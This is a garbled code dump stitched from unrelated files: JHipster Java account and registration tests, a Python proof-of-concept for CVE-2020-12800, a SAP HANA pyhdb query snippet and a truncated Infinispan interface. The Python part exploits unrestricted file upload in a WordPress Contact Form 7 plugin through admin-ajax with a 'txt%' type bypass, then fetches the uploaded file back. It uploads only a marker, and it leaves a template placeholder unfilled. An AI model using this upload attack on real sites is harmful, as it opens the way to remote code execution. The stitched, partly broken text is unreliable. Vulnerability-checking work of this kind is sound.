authorities.add(AuthoritiesConstants.ADMIN);
AdminUserDTO user = new AdminUserDTO();
user.setLogin(TEST_USER_LOGIN);
user.setFirstName("john");
user.setLastName("doe");
user.setEmail("<EMAIL>");
user.setImageUrl("http://placehold.it/50x50");
user.setLangKey("en");
user.setAuthorities(authorities);
userService.createUser(user);
restAccountMockMvc
.perform(get("/api/account").accept(MediaType.APPLICATION_JSON))
.andExpect(status().isOk())
.andExpect(content().contentType(MediaType.APPLICATION_JSON_VALUE))
.andExpect(jsonPath("$.login").value(TEST_USER_LOGIN))
.andExpect(jsonPath("$.firstName").value("john"))
.andExpect(jsonPath("$.lastName").value("doe"))
.andExpect(jsonPath("$.email").value("<EMAIL>"))
.andExpect(jsonPath("$.imageUrl").value("http://placehold.it/50x50"))
.andExpect(jsonPath("$.langKey").value("en"))
.andExpect(jsonPath("$.authorities").value(AuthoritiesConstants.ADMIN));
}
/** GET /api/account fails with 500 when the authenticated login has no user record. */
@Test
void testGetUnknownAccount() throws Exception {
restAccountMockMvc
.perform(get("/api/account").accept(MediaType.APPLICATION_PROBLEM_JSON))
.andExpect(status().isInternalServerError());
}
/** POST /api/register with a valid payload creates the user (201) and persists it. */
@Test
@Transactional
void testRegisterValid() throws Exception {
ManagedUserVM validUser = new ManagedUserVM();
validUser.setLogin("test-register-valid");
validUser.setPassword("password");
validUser.setFirstName("Alice");
validUser.setLastName("Test");
validUser.setEmail("<EMAIL>");
validUser.setImageUrl("http://placehold.it/50x50");
validUser.setLangKey(Constants.DEFAULT_LANGUAGE);
validUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
assertThat(userRepository.findOneByLogin("test-register-valid")).isEmpty();
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(validUser)))
.andExpect(status().isCreated());
assertThat(userRepository.findOneByLogin("test-register-valid")).isPresent();
}
/** POST /api/register rejects a login containing illegal characters (400) and creates no user. */
@Test
@Transactional
void testRegisterInvalidLogin() throws Exception {
ManagedUserVM invalidUser = new ManagedUserVM();
invalidUser.setLogin("funky-log(n"); // <-- invalid
invalidUser.setPassword("password");
invalidUser.setFirstName("Funky");
invalidUser.setLastName("One");
invalidUser.setEmail("<EMAIL>");
invalidUser.setActivated(true);
invalidUser.setImageUrl("http://placehold.it/50x50");
invalidUser.setLangKey(Constants.DEFAULT_LANGUAGE);
invalidUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(invalidUser)))
.andExpect(status().isBadRequest());
Optional<User> user = userRepository.findOneByEmailIgnoreCase("<EMAIL>");
assertThat(user).isEmpty();
}
/** POST /api/register rejects a malformed email address (400) and creates no user. */
@Test
@Transactional
void testRegisterInvalidEmail() throws Exception {
ManagedUserVM invalidUser = new ManagedUserVM();
invalidUser.setLogin("bob");
invalidUser.setPassword("password");
invalidUser.setFirstName("Bob");
invalidUser.setLastName("Green");
invalidUser.setEmail("invalid"); // <-- invalid
invalidUser.setActivated(true);
invalidUser.setImageUrl("http://placehold.it/50x50");
invalidUser.setLangKey(Constants.DEFAULT_LANGUAGE);
invalidUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(invalidUser)))
.andExpect(status().isBadRequest());
Optional<User> user = userRepository.findOneByLogin("bob");
assertThat(user).isEmpty();
}
    // A password shorter than the allowed minimum is rejected with 400.
    @Test
    @Transactional
    void testRegisterInvalidPassword() throws Exception {
        ManagedUserVM invalidUser = new ManagedUserVM();
        invalidUser.setLogin("bob");
        invalidUser.setPassword("<PASSWORD>"); // password with only 3 digits
        invalidUser.setFirstName("Bob");
        invalidUser.setLastName("Green");
        invalidUser.setEmail("<EMAIL>");
        invalidUser.setActivated(true);
        invalidUser.setImageUrl("http://placehold.it/50x50");
        invalidUser.setLangKey(Constants.DEFAULT_LANGUAGE);
        invalidUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
        restAccountMockMvc
            .perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(invalidUser)))
            .andExpect(status().isBadRequest());
        Optional<User> user = userRepository.findOneByLogin("bob");
        assertThat(user).isEmpty();
    }
    // A null password is rejected with 400 and nothing is persisted.
    @Test
    @Transactional
    void testRegisterNullPassword() throws Exception {
        ManagedUserVM invalidUser = new ManagedUserVM();
        invalidUser.setLogin("bob");
        invalidUser.setPassword(null); // invalid null password
        invalidUser.setFirstName("Bob");
        invalidUser.setLastName("Green");
        invalidUser.setEmail("<EMAIL>");
        invalidUser.setActivated(true);
        invalidUser.setImageUrl("http://placehold.it/50x50");
        invalidUser.setLangKey(Constants.DEFAULT_LANGUAGE);
        invalidUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
        restAccountMockMvc
            .perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(invalidUser)))
            .andExpect(status().isBadRequest());
        Optional<User> user = userRepository.findOneByLogin("bob");
        assertThat(user).isEmpty();
    }
    // Re-using a login: allowed while the first registration is not activated (201 below),
    // but rejected with a 4xx once the account holding that login has been activated.
    @Test
    @Transactional
    void testRegisterDuplicateLogin() throws Exception {
        // First registration
        ManagedUserVM firstUser = new ManagedUserVM();
        firstUser.setLogin("alice");
        firstUser.setPassword("password");
        firstUser.setFirstName("Alice");
        firstUser.setLastName("Something");
        firstUser.setEmail("<EMAIL>");
        firstUser.setImageUrl("http://placehold.it/50x50");
        firstUser.setLangKey(Constants.DEFAULT_LANGUAGE);
        firstUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
        // Duplicate login, different email
        ManagedUserVM secondUser = new ManagedUserVM();
        secondUser.setLogin(firstUser.getLogin());
        secondUser.setPassword(<PASSWORD>());
        secondUser.setFirstName(firstUser.getFirstName());
        secondUser.setLastName(firstUser.getLastName());
        secondUser.setEmail("<EMAIL>");
        secondUser.setImageUrl(firstUser.getImageUrl());
        secondUser.setLangKey(firstUser.getLangKey());
        secondUser.setCreatedBy(firstUser.getCreatedBy());
        secondUser.setCreatedDate(firstUser.getCreatedDate());
        secondUser.setLastModifiedBy(firstUser.getLastModifiedBy());
        secondUser.setLastModifiedDate(firstUser.getLastModifiedDate());
        secondUser.setAuthorities(new HashSet<>(firstUser.getAuthorities()));
        // First user
        restAccountMockMvc
            .perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(firstUser)))
            .andExpect(status().isCreated());
        // Second (non activated) user
        restAccountMockMvc
            .perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(secondUser)))
            .andExpect(status().isCreated());
        Optional<User> testUser = userRepository.findOneByEmailIgnoreCase("<EMAIL>");
        assertThat(testUser).isPresent();
        // Activate the account so the login is no longer re-usable.
        testUser.get().setActivated(true);
        userRepository.save(testUser.get());
        // Second (already activated) user
        restAccountMockMvc
            .perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(secondUser)))
            .andExpect(status().is4xxClientError());
    }
    // Re-using an email: while the owning account is not activated, a later registration
    // with the same email (case-insensitively) replaces the earlier one; once activated,
    // further registrations with that email are rejected with a 4xx.
    @Test
    @Transactional
    void testRegisterDuplicateEmail() throws Exception {
        // First user
        ManagedUserVM firstUser = new ManagedUserVM();
        firstUser.setLogin("test-register-duplicate-email");
        firstUser.setPassword("password");
        firstUser.setFirstName("Alice");
        firstUser.setLastName("Test");
        firstUser.setEmail("<EMAIL>");
        firstUser.setImageUrl("http://placehold.it/50x50");
        firstUser.setLangKey(Constants.DEFAULT_LANGUAGE);
        firstUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
        // Register first user
        restAccountMockMvc
            .perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(firstUser)))
            .andExpect(status().isCreated());
        Optional<User> testUser1 = userRepository.findOneByLogin("test-register-duplicate-email");
        assertThat(testUser1).isPresent();
        // Duplicate email, different login
        ManagedUserVM secondUser = new ManagedUserVM();
        secondUser.setLogin("test-register-duplicate-email-2");
        secondUser.setPassword(<PASSWORD>());
        secondUser.setFirstName(firstUser.getFirstName());
        secondUser.setLastName(firstUser.getLastName());
        secondUser.setEmail(firstUser.getEmail());
        secondUser.setImageUrl(firstUser.getImageUrl());
        secondUser.setLangKey(firstUser.getLangKey());
        secondUser.setAuthorities(new HashSet<>(firstUser.getAuthorities()));
        // Register second (non activated) user
        restAccountMockMvc
            .perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(secondUser)))
            .andExpect(status().isCreated());
        // The first (non-activated) registration with this email is gone; the second took it over.
        Optional<User> testUser2 = userRepository.findOneByLogin("test-register-duplicate-email");
        assertThat(testUser2).isEmpty();
        Optional<User> testUser3 = userRepository.findOneByLogin("test-register-duplicate-email-2");
        assertThat(testUser3).isPresent();
        // Duplicate email - with uppercase email address
        ManagedUserVM userWithUpperCaseEmail = new ManagedUserVM();
        userWithUpperCaseEmail.setId(firstUser.getId());
        userWithUpperCaseEmail.setLogin("test-register-duplicate-email-3");
        userWithUpperCaseEmail.setPassword(<PASSWORD>());
        userWithUpperCaseEmail.setFirstName(firstUser.getFirstName());
        userWithUpperCaseEmail.setLastName(firstUser.getLastName());
        userWithUpperCaseEmail.setEmail("<EMAIL>");
        userWithUpperCaseEmail.setImageUrl(firstUser.getImageUrl());
        userWithUpperCaseEmail.setLangKey(firstUser.getLangKey());
        userWithUpperCaseEmail.setAuthorities(new HashSet<>(firstUser.getAuthorities()));
        // Register third (not activated) user
        restAccountMockMvc
            .perform(
                post("/api/register")
                    .contentType(MediaType.APPLICATION_JSON)
                    .content(TestUtil.convertObjectToJsonBytes(userWithUpperCaseEmail))
            )
            .andExpect(status().isCreated());
        Optional<User> testUser4 = userRepository.findOneByLogin("test-register-duplicate-email-3");
        assertThat(testUser4).isPresent();
        assertThat(testUser4.get().getEmail()).isEqualTo("<EMAIL>");
        // Activate the account; the email is now locked to it.
        testUser4.get().setActivated(true);
        userService.updateUser((new AdminUserDTO(testUser4.get())));
        // Register 4th (already activated) user
        restAccountMockMvc
            .perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(secondUser)))
            .andExpect(status().is4xxClientError());
    }
    // Self-registration must not be able to grant ADMIN: the requested authority is
    // ignored and the created user ends up with exactly the USER authority.
    @Test
    @Transactional
    void testRegisterAdminIsIgnored() throws Exception {
        ManagedUserVM validUser = new ManagedUserVM();
        validUser.setLogin("badguy");
        validUser.setPassword("password");
        validUser.setFirstName("Bad");
        validUser.setLastName("Guy");
        validUser.setEmail("<EMAIL>");
        validUser.setActivated(true);
        validUser.setImageUrl("http://placehold.it/50x50");
        validUser.setLangKey(Constants.DEFAULT_LANGUAGE);
        validUser.setAuthorities(Collections.singleton(AuthoritiesConstants.ADMIN));
        restAccountMockMvc
            .perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(validUser)))
            .andExpect(status().isCreated());
        Optional<User> userDup = userRepository.findOneWithAuthoritiesByLogin("badguy");
        assertThat(userDup).isPresent();
        assertThat(userDup.get().getAuthorities())
            .hasSize(1)
            .containsExactly(authorityRepository.findById(AuthoritiesConstants.USER).get());
    }
    // GET /api/activate with a valid key flips the user's activated flag to true.
    @Test
    @Transactional
    void testActivateAccount() throws Exception {
        final String activationKey = "some activation key";
        User user = new User();
        user.setLogin("activate-account");
        user.setEmail("<EMAIL>");
        user.setPassword(<PASSWORD>StringUtils.<PASSWORD>(60));
        user.setActivated(false);
        user.setActivationKey(activationKey);
        userRepository.saveAndFlush(user);
        restAccountMockMvc.perform(get("/api/activate?key={activationKey}", activationKey)).andExpect(status().isOk());
        user = userRepository.findOneByLogin(user.getLogin()).orElse(null);
        assertThat(user.isActivated()).isTrue();
    }
    // An unknown activation key is surfaced as a 500 problem response.
    @Test
    @Transactional
    void testActivateAccountWithWrongKey() throws Exception {
        restAccountMockMvc.perform(get("/api/activate?key=wrongActivationKey")).andExpect(status().isInternalServerError());
    }
    // POST /api/account updates the current user's profile fields while ignoring the
    // privileged fields in the DTO: login, activated, authorities and password stay untouched.
    @Test
    @Transactional
    @WithMockUser("save-account")
    void testSaveAccount() throws Exception {
        User user = new User();
        user.setLogin("save-account");
        user.setEmail("<EMAIL>");
        user.setPassword(RandomStringUtils.random(60));
        user.setActivated(true);
        userRepository.saveAndFlush(user);
        AdminUserDTO userDTO = new AdminUserDTO();
        userDTO.setLogin("not-used");
        userDTO.setFirstName("firstname");
        userDTO.setLastName("lastname");
        userDTO.setEmail("<EMAIL>");
        userDTO.setActivated(false);
        userDTO.setImageUrl("http://placehold.it/50x50");
        userDTO.setLangKey(Constants.DEFAULT_LANGUAGE);
        userDTO.setAuthorities(Collections.singleton(AuthoritiesConstants.ADMIN));
        restAccountMockMvc
            .perform(post("/api/account").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(userDTO)))
            .andExpect(status().isOk());
        User updatedUser = userRepository.findOneWithAuthoritiesByLogin(user.getLogin()).orElse(null);
        assertThat(updatedUser.getFirstName()).isEqualTo(userDTO.getFirstName());
        assertThat(updatedUser.getLastName()).isEqualTo(userDTO.getLastName());
        assertThat(updatedUser.getEmail()).isEqualTo(userDTO.getEmail());
        assertThat(updatedUser.getLangKey()).isEqualTo(userDTO.getLangKey());
        // Password is never changed through this endpoint.
        assertThat(updatedUser.getPassword()).isEqualTo(user.getPassword());
        assertThat(updatedUser.getImageUrl()).isEqualTo(userDTO.getImageUrl());
        // activated=false and ADMIN from the DTO were ignored.
        assertThat(updatedUser.isActivated()).isTrue();
        assertThat(updatedUser.getAuthorities()).isEmpty();
    }
    // Saving the account with a malformed email is rejected with 400.
    @Test
    @Transactional
    @WithMockUser("save-invalid-email")
    void testSaveInvalidEmail() throws Exception {
        User user = new User();
        user.setLogin("save-invalid-email");
        user.setEmail("<EMAIL>");
        user.setPassword(<PASSWORD>(60));
        user.setActivated(true);
        userRepository.saveAndFlush(user);
        AdminUserDTO userDTO = new AdminUserDTO();
        userDTO.setLogin("not-used");
        userDTO.setFirstName("firstname");
        userDTO.setLastName("lastname");
        userDTO.setEmail("invalid email");
        userDTO.setActivated(false);
        userDTO.setImageUrl("http://placehold.it/50x50");
        userDTO.setLangKey(Constants.DEFAULT_LANGUAGE);
        userDTO.setAuthorities(Collections.singleton(AuthoritiesConstants.ADMIN));
        restAccountMockMvc
            .perform(post("/api/account").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(userDTO)))
            .andExpect(status().isBadRequest());
        assertThat(userRepository.findOneByEmailIgnoreCase("invalid email")).isNotPresent();
    }
    // Saving the account with an email already owned by another user is rejected
    // with 400, and the current user's email remains unchanged.
    @Test
    @Transactional
    @WithMockUser("save-existing-email")
    void testSaveExistingEmail() throws Exception {
        User user = new User();
        user.setLogin("save-existing-email");
        user.setEmail("<EMAIL>");
        user.setPassword(RandomStringUtils.random(60));
        user.setActivated(true);
        userRepository.saveAndFlush(user);
        // Second user who already owns the email the first user will try to take.
        User anotherUser = new User();
        anotherUser.setLogin("save-existing-email2");
        anotherUser.setEmail("<EMAIL>");
        anotherUser.setPassword(RandomStringUtils.random(60));
        anotherUser.setActivated(true);
        userRepository.saveAndFlush(anotherUser);
        AdminUserDTO userDTO = new AdminUserDTO();
        userDTO.setLogin("not-used");
        userDTO.setFirstName("firstname");
        userDTO.setLastName("lastname");
        userDTO.setEmail("<EMAIL>");
        userDTO.setActivated(false);
        userDTO.setImageUrl("http://placehold.it/50x50");
        userDTO.setLangKey(Constants.DEFAULT_LANGUAGE);
        userDTO.setAuthorities(Collections.singleton(AuthoritiesConstants.ADMIN));
        restAccountMockMvc
            .perform(post("/api/account").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(userDTO)))
            .andExpect(status().isBadRequest());
        User updatedUser = userRepository.findOneByLogin("save-existing-email").orElse(null);
        assertThat(updatedUser.getEmail()).isEqualTo("<EMAIL>");
    }
    // Saving the account re-using the user's own email is fine (200) since the
    // email belongs to the very account being updated.
    @Test
    @Transactional
    @WithMockUser("save-existing-email-and-login")
    void testSaveExistingEmailAndLogin() throws Exception {
        User user = new User();
        user.setLogin("save-existing-email-and-login");
        user.setEmail("<EMAIL>");
        user.setPassword(RandomStringUtils.random(60));
        user.setActivated(true);
        userRepository.saveAndFlush(user);
        AdminUserDTO userDTO = new AdminUserDTO();
        userDTO.setLogin("not-used");
        userDTO.setFirstName("firstname");
        userDTO.setLastName("lastname");
        userDTO.setEmail("<EMAIL>");
        userDTO.setActivated(false);
        userDTO.setImageUrl("http://placehold.it/50x50");
        userDTO.setLangKey(Constants.DEFAULT_LANGUAGE);
        userDTO.setAuthorities(Collections.singleton(AuthoritiesConstants.ADMIN));
        restAccountMockMvc
            .perform(post("/api/account").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(userDTO)))
            .andExpect(status().isOk());
        User updatedUser = userRepository.findOneByLogin("save-existing-email-and-login").orElse(null);
        assertThat(updatedUser.getEmail()).isEqualTo("<EMAIL>");
    }
    // Changing the password with a wrong current password is rejected with 400
    // and the stored password hash is left untouched.
    @Test
    @Transactional
    @WithMockUser("change-password-wrong-existing-password")
    void testChangePasswordWrongExistingPassword() throws Exception {
        User user = new User();
        String currentPassword = <PASSWORD>.random(60);
        user.setPassword(<PASSWORD>(currentPassword));
        user.setLogin("change-password-wrong-existing-password");
        user.setEmail("<EMAIL>");
        userRepository.saveAndFlush(user);
        restAccountMockMvc
            .perform(
                post("/api/account/change-password")
                    .contentType(MediaType.APPLICATION_JSON)
                    // "1" + currentPassword is deliberately not the real current password.
                    .content(TestUtil.convertObjectToJsonBytes(new PasswordChangeDTO("1" + currentPassword, "new password")))
            )
            .andExpect(status().isBadRequest());
        User updatedUser = userRepository.findOneByLogin("change-password-wrong-existing-password").orElse(null);
        assertThat(passwordEncoder.matches("new password", updatedUser.getPassword())).isFalse();
        assertThat(passwordEncoder.matches(currentPassword, updatedUser.getPassword())).isTrue();
    }
    // Happy path: with the correct current password, the new password is stored (encoded).
    @Test
    @Transactional
    @WithMockUser("change-password")
    void testChangePassword() throws Exception {
        User user = new User();
        String currentPassword = <PASSWORD>.random(60);
        user.setPassword(passwordEncoder.encode(currentPassword));
        user.setLogin("change-password");
        user.setEmail("<EMAIL>");
        userRepository.saveAndFlush(user);
        restAccountMockMvc
            .perform(
                post("/api/account/change-password")
                    .contentType(MediaType.APPLICATION_JSON)
                    .content(TestUtil.convertObjectToJsonBytes(new PasswordChangeDTO(currentPassword, "new password")))
            )
            .andExpect(status().isOk());
        User updatedUser = userRepository.findOneByLogin("change-password").orElse(null);
        assertThat(passwordEncoder.matches("new password", updatedUser.getPassword())).isTrue();
    }
    // A new password one character below PASSWORD_MIN_LENGTH is rejected with 400.
    @Test
    @Transactional
    @WithMockUser("change-password-too-small")
    void testChangePasswordTooSmall() throws Exception {
        User user = new User();
        String currentPassword = <PASSWORD>.<PASSWORD>(60);
        user.setPassword(passwordEncoder.encode(currentPassword));
        user.setLogin("change-password-too-small");
        user.setEmail("<EMAIL>");
        userRepository.saveAndFlush(user);
        String newPassword = RandomStringUtils.random(ManagedUserVM.PASSWORD_MIN_LENGTH - 1);
        restAccountMockMvc
            .perform(
                post("/api/account/change-password")
                    .contentType(MediaType.APPLICATION_JSON)
                    .content(TestUtil.convertObjectToJsonBytes(new PasswordChangeDTO(currentPassword, newPassword)))
            )
            .andExpect(status().isBadRequest());
        User updatedUser = userRepository.findOneByLogin("change-password-too-small").orElse(null);
        assertThat(updatedUser.getPassword()).isEqualTo(user.getPassword());
    }
    // A new password one character above PASSWORD_MAX_LENGTH is rejected with 400.
    @Test
    @Transactional
    @WithMockUser("change-password-too-long")
    void testChangePasswordTooLong() throws Exception {
        User user = new User();
        String currentPassword = <PASSWORD>StringUtils.random(60);
        user.setPassword(passwordEncoder.encode(currentPassword));
        user.setLogin("change-password-too-long");
        user.setEmail("<EMAIL>");
        userRepository.saveAndFlush(user);
        String newPassword = RandomStringUtils.random(ManagedUserVM.PASSWORD_MAX_LENGTH + 1);
        restAccountMockMvc
            .perform(
                post("/api/account/change-password")
                    .contentType(MediaType.APPLICATION_JSON)
                    .content(TestUtil.convertObjectToJsonBytes(new PasswordChangeDTO(currentPassword, newPassword)))
            )
            .andExpect(status().isBadRequest());
        User updatedUser = userRepository.findOneByLogin("change-password-too-long").orElse(null);
        assertThat(updatedUser.getPassword()).isEqualTo(user.getPassword());
    }
    // An empty new password is rejected with 400 and the stored hash is unchanged.
    @Test
    @Transactional
    @WithMockUser("change-password-empty")
    void testChangePasswordEmpty() throws Exception {
        User user = new User();
        String currentPassword = RandomStringUtils.random(60);
        user.setPassword(<PASSWORD>(currentPassword));
        user.setLogin("change-password-empty");
        user.setEmail("<EMAIL>");
        userRepository.saveAndFlush(user);
        restAccountMockMvc
            .perform(
                post("/api/account/change-password")
                    .contentType(MediaType.APPLICATION_JSON)
                    .content(TestUtil.convertObjectToJsonBytes(new PasswordChangeDTO(currentPassword, "")))
            )
            .andExpect(status().isBadRequest());
        User updatedUser = userRepository.findOneByLogin("change-password-empty").orElse(null);
        assertThat(updatedUser.getPassword()).isEqualTo(user.getPassword());
    }
    // Requesting a reset for an existing, activated account's email returns 200.
    @Test
    @Transactional
    void testRequestPasswordReset() throws Exception {
        User user = new User();
        user.setPassword(RandomStringUtils.random(60));
        user.setActivated(true);
        user.setLogin("password-reset");
        user.setEmail("<EMAIL>");
        userRepository.saveAndFlush(user);
        restAccountMockMvc
            .perform(post("/api/account/reset-password/init").content("<EMAIL>"))
            .andExpect(status().isOk());
    }
    // Reset requests match the stored email case-insensitively: still 200.
    @Test
    @Transactional
    void testRequestPasswordResetUpperCaseEmail() throws Exception {
        User user = new User();
        user.setPassword(RandomStringUtils.random(60));
        user.setActivated(true);
        user.setLogin("password-reset-upper-case");
        user.setEmail("<EMAIL>");
        userRepository.saveAndFlush(user);
        restAccountMockMvc
            .perform(post("/api/account/reset-password/init").content("<EMAIL>"))
            .andExpect(status().isOk());
    }
    // An unknown email still yields 200, so the endpoint does not leak which
    // addresses are registered.
    @Test
    void testRequestPasswordResetWrongEmail() throws Exception {
        restAccountMockMvc
            .perform(post("/api/account/reset-password/init").content("<EMAIL>"))
            .andExpect(status().isOk());
    }
    // Finishing a reset with a valid, non-expired key stores the new password (encoded).
    @Test
    @Transactional
    void testFinishPasswordReset() throws Exception {
        User user = new User();
        user.setPassword(RandomStringUtils.random(60));
        user.setLogin("finish-password-reset");
        user.setEmail("<EMAIL>");
        // Reset date in the future keeps the key valid for this test.
        user.setResetDate(Instant.now().plusSeconds(60));
        user.setResetKey("reset key");
        userRepository.saveAndFlush(user);
        KeyAndPasswordVM keyAndPassword = new KeyAndPasswordVM();
        keyAndPassword.setKey(user.getResetKey());
        keyAndPassword.setNewPassword("<PASSWORD>");
        restAccountMockMvc
            .perform(
                post("/api/account/reset-password/finish")
                    .contentType(MediaType.APPLICATION_JSON)
                    .content(TestUtil.convertObjectToJsonBytes(keyAndPassword))
            )
            .andExpect(status().isOk());
        User updatedUser = userRepository.findOneByLogin(user.getLogin()).orElse(null);
        assertThat(passwordEncoder.matches(keyAndPassword.getNewPassword(), updatedUser.getPassword())).isTrue();
    }
    // Finishing a reset with a too-short new password is rejected with 400 and
    // the password is not changed.
    @Test
    @Transactional
    void testFinishPasswordResetTooSmall() throws Exception {
        User user = new User();
        user.setPassword(Random<PASSWORD>.random(60));
        user.setLogin("finish-password-reset-too-small");
        user.setEmail("<EMAIL>");
        user.setResetDate(Instant.now().plusSeconds(60));
        user.setResetKey("reset key too small");
        userRepository.saveAndFlush(user);
        KeyAndPasswordVM keyAndPassword = new KeyAndPasswordVM();
        keyAndPassword.setKey(user.getResetKey());
        keyAndPassword.setNewPassword("<PASSWORD>");
        restAccountMockMvc
            .perform(
                post("/api/account/reset-password/finish")
                    .contentType(MediaType.APPLICATION_JSON)
                    .content(TestUtil.convertObjectToJsonBytes(keyAndPassword))
            )
            .andExpect(status().isBadRequest());
        User updatedUser = userRepository.findOneByLogin(user.getLogin()).orElse(null);
        assertThat(passwordEncoder.matches(keyAndPassword.getNewPassword(), updatedUser.getPassword())).isFalse();
    }
    // Finishing a reset with an unknown key is surfaced as a 500 problem response.
    @Test
    @Transactional
    void testFinishPasswordResetWrongKey() throws Exception {
        KeyAndPasswordVM keyAndPassword = new KeyAndPasswordVM();
        keyAndPassword.setKey("wrong reset key");
        keyAndPassword.setNewPassword("<PASSWORD>");
        restAccountMockMvc
            .perform(
                post("/api/account/reset-password/finish")
                    .contentType(MediaType.APPLICATION_JSON)
                    .content(TestUtil.convertObjectToJsonBytes(keyAndPassword))
            )
            .andExpect(status().isInternalServerError());
    }
}
| 13,094 |
421 | import requests
# Vuln Base Info
def info():
    """Static metadata describing the CVE-2020-12800 check, consumed by the scanner framework."""
    return {
        "author": "cckuailong",
        "name": '''WordPress 'Drag & Drop Multiple File Upload - Contact Form 7' Plugin - Pre-auth RCE''',
        "description": '''The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.''',
        "severity": "critical",
        "references": [
            "https://github.com/amartinsec/CVE-2020-12800"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "cvss-score": "",
            "cve-id": "CVE-2020-12800",
            "cwe-id": "CWE-434"
        },
        "metadata":{
            "vuln-target": "",
        },
        "tags": ["cve", "cve2020", "wordpress", "wp-plugin", "upload"],
    }
# Vender Fingerprint
def fingerprint(url):
    """Vendor fingerprint hook.

    This PoC performs no pre-filtering, so every target URL is treated as a
    candidate and the real check happens in poc().
    """
    return True
# Proof of Concept
def poc(url):
    """Probe a WordPress target for CVE-2020-12800 (unrestricted file upload).

    Uploads a harmless marker file through the vulnerable
    ``dnd_codedropz_upload`` AJAX action, then fetches it back from the
    plugin's uploads directory to confirm the upload landed.

    Returns a dict that always contains a boolean ``"success"`` key; on
    success it also carries the ``info()`` metadata and the uploaded file URL.
    """
    # Start from an explicit failure state so callers can always read
    # result["success"]. (Previously the key was only set inside the
    # success branch or the except handler, so a non-matching response
    # returned a bare {} and broke result["success"] lookups.)
    result = {"success": False}
    try:
        url = format_url(url)
        path = """/wp-admin/admin-ajax.php"""
        method = "POST"
        data = """-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="supported_type"
txt%
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="size_limit"
5242880
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="action"
dnd_codedropz_upload
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="type"
click
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.txt%"
Content-Type: application/x-httpd-php
CVE-2020-12800-{{randstr}}
-----------------------------350278735926454076983690555601--"""
        headers = {'Content-Type': 'multipart/form-data; boundary=---------------------------350278735926454076983690555601', 'X-Requested-With': 'XMLHttpRequest'}
        # Step 1: upload the marker file via the vulnerable AJAX action.
        resp0 = requests.request(method=method, url=url + path, data=data, headers=headers, timeout=10, verify=False, allow_redirects=False)
        # Step 2: fetch the marker back from the plugin's uploads directory.
        path = """/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt"""
        method = "GET"
        data = """"""
        headers = {}
        resp1 = requests.request(method=method, url=url + path, data=data, headers=headers, timeout=10, verify=False, allow_redirects=False)
        if (resp1.status_code == 200) and ("""CVE-2020-12800-{{randstr}}""" in resp1.text) and ("""text/plain""" in str(resp1.headers)):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except Exception:
        # Network errors / timeouts simply leave "success" as False.
        pass
    return result
# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; for this vuln it is identical to the non-destructive poc() check."""
    return poc(url)
# Utils
def format_url(url):
    """Normalize a target URL: trim whitespace, default to http://, drop trailing slashes."""
    normalized = url.strip()
    if not normalized.startswith(("http://", "https://")):
        normalized = "http://" + normalized
    return normalized.rstrip("/")
301 | <reponame>jmilkiewicz/iot-starterkit<filename>neo/apps/python/consumption/pyhdb/iotpyhdb.py<gh_stars>100-1000
import pyhdb
# Open a SAP HANA connection; credentials/placeholders are filled in by the user.
connection = pyhdb.connect(
    host="localhost",
    port=30015,
    user="<user>",
    password="<password>"
)
try:
    cursor = connection.cursor()
    # Read all rows captured for the IoT message type.
    cursor.execute("SELECT * FROM NEO_<schema_id>.T_IOT_<message_type_id>")
    for result in cursor.fetchall():
        # print() form works on both Python 2 and 3 (original used the
        # Python-2-only statement form).
        print(result)
finally:
    # Always release the connection, even if the query fails.
    connection.close()
713 | package org.infinispan.xsite.statetransfer;
import java.util.concurrent.CompletionStage;
import io.reactivex.rxjava3.core.Flowable;
/**
* Sends local cluster state to remote site.
*
* @author <NAME>
* @since 12.0
*/
public interface XSiteStatePushTask {
    /**
     * Perform the state transfer with the state from {@link Flowable}.
     * <p>
     * The {@link Flowable} can only be iterated after {@code delayer} is completed.
     * <p>
     * NOTE(review): implementations appear to subscribe to the flowable once
     * {@code delayer} completes — confirm single-subscription expectations.
     *
     * @param flowable The {@link Flowable} with the local cluster state.
